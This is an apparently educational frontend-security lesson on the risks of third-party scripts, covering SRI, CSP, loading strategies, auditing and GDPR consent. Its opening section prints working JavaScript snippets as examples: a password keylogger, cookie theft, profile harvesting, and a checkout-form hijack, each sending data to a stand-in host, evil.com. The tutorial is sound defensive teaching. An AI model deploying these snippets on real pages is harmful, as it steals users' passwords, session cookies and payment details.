Frontend Security

Third-Party Script Risks

intermediate14 min read

You Invited Strangers Into Your House

Every time you drop a <script> tag from a third-party into your page, you're handing someone else the keys to your entire application. Not a restricted guest pass — the full keys. That script runs with the same privileges as your own code. It can read any DOM element, intercept form submissions, access cookies, fire network requests to any server, and modify anything on the page.

Most developers don't think twice about adding analytics, chat widgets, A/B testing tools, or ad scripts. But here's the uncomfortable truth: you're trusting that third-party's entire supply chain — their developers, their infrastructure, their dependencies, and everyone who has push access to their CDN.

Mental Model

Think of your web page as your apartment. Your own JavaScript is you living there. A third-party script is a contractor you invited inside to fix the plumbing. Except this contractor can also open your mail, copy your house keys, rearrange your furniture, install hidden cameras, and invite their own friends in — all while you're not watching. You asked for plumbing. You got total access.

What Third-Party Scripts Can Actually Do

This isn't theoretical. Let's be specific about what a script loaded from https://analytics.example.com/tracker.js can do once it's on your page:

Full DOM access:

document.querySelectorAll('input[type="password"]')
  .forEach(input => {
    input.addEventListener('input', e => {
      fetch('https://evil.com/steal', {
        method: 'POST',
        body: JSON.stringify({
          field: input.name,
          value: e.target.value
        })
      });
    });
  });

That's a keylogger on every password field. Six lines of code. No permission dialog. No browser warning.

Cookie access:

// Read all non-HttpOnly cookies — session tokens, auth state, preferences
const allCookies = document.cookie;

// Exfiltrate to attacker's server
new Image().src = `https://evil.com/collect?cookies=${encodeURIComponent(allCookies)}`;

Network requests to any origin:

// Fetch your internal API using the user's credentials
const userData = await fetch('/api/user/profile', { credentials: 'include' });
const data = await userData.json();

// Send it somewhere else
navigator.sendBeacon('https://evil.com/harvest', JSON.stringify(data));

DOM modification:

// Swap out a payment form's action URL
document.querySelector('form.checkout')
  .setAttribute('action', 'https://evil.com/fake-checkout');

None of this requires any special browser APIs. These are the same capabilities your own JavaScript has. The browser doesn't distinguish between your code and theirs.

Quiz
A third-party analytics script is loaded via a regular script tag. Which of the following can it NOT do?

The Real Attack Surface: Supply Chain Compromise

You might trust Google Analytics. But the bigger risk isn't the script you chose — it's the script that script loads, or the compromised CDN that serves a modified version, or the npm dependency three levels deep that got hijacked.

Real-world incidents:

  • British Airways (2018): A modified Magecart script injected into their payment page skimmed 380,000 credit card details over two weeks. The script was loaded from a compromised third-party supplier.
  • Codecov (2021): Attackers modified a bash uploader script hosted on Codecov's servers. Any CI/CD pipeline that fetched the script got a backdoored version that exfiltrated environment variables.
  • Polyfill.io (2024): The polyfill.io domain was acquired by a new owner who injected malicious redirects into the script served to millions of websites.

The pattern is always the same: attackers don't need to hack your site. They hack a script your site loads. And your users pay the price.

The polyfill.io lesson

In 2024, over 100,000 websites were affected when the polyfill.io CDN domain changed ownership and began serving malicious code. The original script was legitimate for years. The new owner modified it to redirect users to scam sites. If you load scripts from domains you do not control, this can happen to you.

Subresource Integrity (SRI) — Verify What You Load

SRI lets you pin a cryptographic hash to a script or stylesheet. The browser downloads the resource, computes its hash, and refuses to execute it if the hash doesn't match. If an attacker modifies the file on the CDN, the hash breaks and the browser blocks it.

<script
  src="https://cdn.example.com/library@2.4.1/lib.min.js"
  integrity="sha384-oqVuAfXRKap7fdgcCY5uykM6+R9GqQ8K/uxy9rx7HNQlGYl1kPzQho1wx4JwY8wC"
  crossorigin="anonymous"
></script>

How to generate the hash:

# Download the file and compute its SHA-384 hash
curl -s https://cdn.example.com/library.js | openssl dgst -sha384 -binary | openssl base64 -A

What SRI protects against:

  • CDN compromise (attacker modifies the file on the server)
  • Man-in-the-middle attacks (attacker intercepts and modifies in transit)
  • Domain takeover (the CDN domain gets acquired by a malicious actor)

What SRI does NOT protect against:

  • The script being malicious from the start (you hash a bad script, it will always match)
  • Dynamic scripts that change on every request (the hash will never match)
  • Scripts that load other scripts dynamically (SRI only covers the entry point)
Quiz
You add SRI hashes to all your third-party scripts. A CDN you use gets compromised, and the attacker modifies the JavaScript file. What happens?
SRI and auto-updating scripts don't mix

SRI requires a fixed file. If you use a URL like https://cdn.example.com/library@latest/lib.js, the file changes on every update, and the hash breaks every time. Use exact version URLs with SRI, or self-host the script and pin your own version.

Loading Strategies: async, defer, and Web Workers

How you load a third-party script affects both performance and security. The loading strategy determines when the script executes and how much it can block your page.

async vs defer

<!-- BLOCKS page rendering until downloaded AND executed -->
<script src="https://third-party.com/widget.js"></script>

<!-- Downloads in parallel, executes as soon as ready (can interrupt parsing) -->
<script async src="https://third-party.com/analytics.js"></script>

<!-- Downloads in parallel, executes after HTML parsing is complete -->
<script defer src="https://third-party.com/non-critical.js"></script>

For third-party scripts, defer is almost always the right choice. It doesn't block parsing, and it executes in DOM order — predictable and non-disruptive. Use async only when execution order doesn't matter and you want the fastest possible execution (analytics beacons, for example).

Never load third-party scripts without async or defer. A synchronous third-party script that takes 3 seconds to download adds 3 seconds to your page load. If their server goes down, your page hangs.

Partytown — Run Third-Party Scripts in a Web Worker

Partytown takes a radical approach: it moves third-party scripts off the main thread entirely by running them inside a Web Worker. This means analytics, ads, and tracking scripts can't block rendering or cause long tasks on the main thread.

<!-- Partytown forwards specific scripts to a web worker -->
<script type="text/partytown" src="https://analytics.example.com/tracker.js"></script>

The trick is that Web Workers don't have DOM access. Partytown intercepts DOM API calls from the worker, synchronously proxies them to the main thread, and returns results. It's clever, but comes with tradeoffs:

  • Works well for analytics and tracking scripts that mostly read the DOM
  • Breaks scripts that need synchronous DOM mutations or rely on specific timing
  • Adds complexity to your build and debugging process
  • Not a security boundary — Partytown is a performance tool, not a sandbox
Quiz
A third-party analytics script is loaded with the async attribute. The script takes 2 seconds to download. What happens?

Content Security Policy — Limiting What Scripts Can Do

SRI verifies that a specific file hasn't been tampered with. CSP takes a broader approach: it tells the browser which sources are allowed to load scripts, styles, images, and other resources. Anything not on the allowlist gets blocked.

Content-Security-Policy:
  default-src 'self';
  script-src 'self' https://cdn.example.com https://analytics.example.com;
  style-src 'self' 'unsafe-inline';
  img-src 'self' data: https:;
  connect-src 'self' https://api.example.com;
  frame-src 'none';
  object-src 'none';

This policy says:

  • Scripts can only load from your domain, cdn.example.com, and analytics.example.com
  • No inline scripts (unless you add 'unsafe-inline' to script-src — avoid this)
  • Images from your domain, data URIs, and any HTTPS source
  • XHR/fetch only to your domain and api.example.com
  • No iframes, no plugins

The power move: connect-src limits where scripts can send data. Even if a third-party script gets compromised, it can only exfiltrate data to origins listed in connect-src. A keylogger script can still read passwords, but it can't phone home to evil.com if that domain isn't in the policy.

CSP Reporting

CSP can report violations without blocking them, which is incredibly useful for auditing:

Content-Security-Policy-Report-Only:
  default-src 'self';
  script-src 'self' https://cdn.example.com;
  report-uri /api/csp-reports;

Deploy in report-only mode first. Collect violations for a week. Fix legitimate requests. Then switch to enforcement. This prevents you from accidentally breaking your own site.

Nonces vs Hashes for Inline Scripts

If you need inline scripts (many third-party widgets inject them), you have two options beyond 'unsafe-inline':

Nonces — generate a random value per request and include it in both the CSP header and the script tag:

Content-Security-Policy: script-src 'nonce-abc123def456'
<script nonce="abc123def456">
  // This inline script is allowed because the nonce matches
</script>

Hashes — compute the SHA-256 hash of the inline script content and include it in the CSP header:

Content-Security-Policy: script-src 'sha256-base64encodedHashHere'

Nonces are easier to manage for dynamic content. Hashes work better for static inline scripts that never change. Both are far safer than 'unsafe-inline'.

Quiz
Your CSP policy includes connect-src 'self' https://api.example.com. A compromised third-party script tries to send stolen data to https://evil.com via fetch. What happens?

Auditing Third-Party Scripts

You can't secure what you don't know about. Most sites have far more third-party requests than their developers realize — scripts load other scripts, which load tracking pixels, which load more scripts.

Step 1: Map Your Third-Party Inventory

Open DevTools, go to the Network tab, reload the page, and filter by "JS". Every domain that isn't yours is a third-party script. You'll probably be surprised by how many there are.

// Quick audit: list all external scripts on the current page
const externalScripts = [...document.querySelectorAll('script[src]')]
  .filter(s => !s.src.startsWith(location.origin))
  .map(s => new URL(s.src).hostname);

console.table([...new Set(externalScripts)]);

Step 2: Classify by Risk

Risk LevelCategoryExamples
HighPayment, AuthStripe.js, Auth0 Lock
HighTag ManagersGoogle Tag Manager (can inject any script)
MediumAnalyticsGoogle Analytics, Mixpanel, Amplitude
MediumChat / SupportIntercom, Zendesk widget
LowPerformanceCDN-hosted libraries (with SRI)
LowFontsGoogle Fonts, Adobe Fonts

Tag managers deserve special attention. Google Tag Manager is essentially a remote code execution platform — marketing teams can inject arbitrary scripts into your page without a deploy. If someone gains access to your GTM account, they can inject whatever they want.

Step 3: Set a Performance and Security Budget

For each third-party, evaluate:

  • Size: How many KB does it add?
  • Requests: How many additional requests does it trigger?
  • Main thread time: How many ms of main thread time does it consume?
  • Data access: What user data can it read?
  • Necessity: What happens if you remove it?

Tools like WebPageTest, Chrome DevTools Performance panel, and bundlephobia can quantify the cost. If a third-party script adds 200KB and 500ms to your load time, the business value better justify it.

Privacy Implications and Compliance

Third-party scripts aren't just a security risk — they're a privacy liability. Under GDPR, CCPA, and similar regulations, you are responsible for what third-party scripts do with your users' data, even if you didn't write the code.

What Third-Party Scripts Typically Collect

  • Cookies: First-party and third-party cookies for cross-site tracking
  • Fingerprinting: Canvas fingerprints, WebGL renderer, installed fonts, screen resolution, timezone
  • Behavioral data: Mouse movements, scroll depth, click patterns, time on page
  • PII exposure: Form field values, URL parameters (which may contain user IDs, email addresses, or tokens)

GDPR and ePrivacy Requirements

Under GDPR:

  • Analytics cookies require consent — you cannot fire Google Analytics before the user explicitly opts in
  • You must disclose every third-party that receives user data in your privacy policy
  • Data processing agreements (DPAs) are required with each third-party vendor
  • Purpose limitation — data collected for analytics cannot be repurposed for advertising without separate consent

A consent management platform (CMP) must control which scripts fire based on user consent:

// Pseudocode for consent-aware script loading
function loadScript(src, category) {
  const consent = getConsentState();

  if (consent[category] === true) {
    const script = document.createElement('script');
    script.src = src;
    script.defer = true;
    document.head.appendChild(script);
  }
}

// Only load after user grants consent for each category
loadScript('https://analytics.example.com/tracker.js', 'analytics');
loadScript('https://ads.example.com/pixel.js', 'advertising');

The critical rule: no scripts fire before consent. Many implementations get this wrong by loading scripts first and then asking for consent, which is a GDPR violation. The script should not exist on the page until the user opts in.

Quiz
Under GDPR, when is it legal to load a third-party analytics script that sets tracking cookies?

Defense in Depth: Combining Protections

No single technique is sufficient. The strongest posture combines multiple layers:

Practical Hardening Checklist

Here's what a production-ready third-party script policy looks like:

  1. Inventory all third-party scripts quarterly. Remove anything you're not actively using.
  2. SRI hashes on every CDN-loaded script and stylesheet. Pin exact versions.
  3. CSP header in enforcement mode (not just report-only). Restrict script-src, connect-src, and frame-src.
  4. Load with defer or async. Never synchronous. Use Partytown for scripts that don't need main thread access.
  5. Self-host critical libraries instead of loading from public CDNs. You control the supply chain.
  6. HttpOnly + Secure + SameSite on all sensitive cookies. Third-party scripts cannot read HttpOnly cookies.
  7. Consent management that blocks all non-essential scripts until explicit user opt-in.
  8. Monitor CSP reports and alert on new violations. A sudden spike in violations may indicate compromise.
What developers doWhat they should do
Adding third-party scripts without async or defer
A synchronous third-party script blocks HTML parsing. If their server is slow or down, your entire page hangs. There is almost never a reason for a third-party script to be synchronous.
Always use defer (or async for order-independent scripts) for third-party scripts
Using SRI with auto-updating script URLs like @latest
SRI hashes a specific file. If the file changes (new version), the hash breaks, and the browser blocks the script. Either pin versions or self-host.
Pin exact versions when using SRI, or self-host and control updates yourself
Setting CSP to report-only and never switching to enforcement
Report-only mode provides visibility but zero protection. It is a diagnostic step, not a security measure. Staying in report-only indefinitely gives a false sense of security.
Use report-only to audit, then move to enforcement mode within a planned timeline
Loading analytics scripts before the user consents to cookies
Under GDPR, loading a tracking script before consent is a violation, even if you show a cookie banner. The script must not be present in the DOM until consent is granted.
Block all non-essential scripts until the user explicitly opts in through your CMP
Trusting Google Tag Manager without access controls
GTM allows anyone with publish access to inject arbitrary JavaScript into your production site. A compromised GTM account is equivalent to a full site compromise. Treat it like production deployment access.
Restrict GTM access with role-based permissions and review all new tags before publishing
Key Rules
  1. 1Every third-party script runs with the same privileges as your own code — full DOM access, cookie access, and network access.
  2. 2SRI hashes verify a file has not been tampered with. Pin exact versions and regenerate hashes on updates.
  3. 3CSP restricts which origins can load scripts and where scripts can send data. Use connect-src to limit data exfiltration.
  4. 4Always load third-party scripts with defer or async. Never synchronous. Use Partytown to move analytics off the main thread.
  5. 5Under GDPR, no non-essential scripts should fire before explicit user consent. Showing a banner is not consent.
  6. 6Audit your third-party inventory quarterly. You are responsible for what every script on your page does — including scripts loaded by other scripts.
Quiz
Your website loads a script from a CDN with an SRI hash. The CDN gets acquired by a new owner who modifies the script to include a cryptocurrency miner. You also have a CSP policy with a strict connect-src. What happens?
Related Topics
10/11